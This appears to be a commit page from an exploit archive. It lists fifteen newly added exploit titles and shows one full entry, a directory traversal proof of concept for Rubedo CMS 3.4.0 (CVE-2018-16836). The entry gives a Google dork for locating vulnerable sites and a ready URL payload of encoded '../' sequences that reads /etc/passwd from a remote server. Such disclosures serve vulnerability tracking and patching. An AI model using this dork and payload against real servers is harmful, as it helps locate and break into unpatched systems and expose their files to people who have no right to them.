b42759b8b8
15 changes to exploits/shellcodes jiNa OCR Image to Text 1.0 - Denial of Service (PoC) PixGPS 1.1.8 - Denial of Service (PoC) RoboImport 1.2.0.72 - Denial of Service (PoC) PicaJet FX 2.6.5 - Denial of Service (PoC) iCash 7.6.5 - Denial of Service (PoC) PDF Explorer 1.5.66.2 - Denial of Service (PoC) Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC) Apple macOS 10.13.4 - Denial of Service (PoC) CirCarLife SCADA 4.3.0 - Credential Disclosure Rubedo CMS 3.4.0 - Directory Traversal SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS) SynaMan 4.0 build 1488 - SMTP Credential Disclosure IBM Identity Governance and Intelligence 5.2.3.2 / 5.2.4 - SQL Injection MyBB 1.8.17 - Cross-Site Scripting LG Smart IP Camera 1508190 - Backup File Download
13 lines
No EOL
489 B
Text
13 lines
No EOL
489 B
Text
# Exploit Title: Rubedo CMS 3.4.0 - Directory Traversal
|
|
# Google Dork: intext:rubedo.current.page.description
|
|
# Date: 2018-09-11
|
|
# Exploit Author: Marouene Boubakri
|
|
# Vendor Homepage: https://www.rubedo-project.org
|
|
# Version: through 3.4.0
|
|
# Tested on: Linux
|
|
# CVE : CVE-2018-16836
|
|
|
|
# PoC:
|
|
# Read /etc/passwd file from remote server
|
|
|
|
/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd' |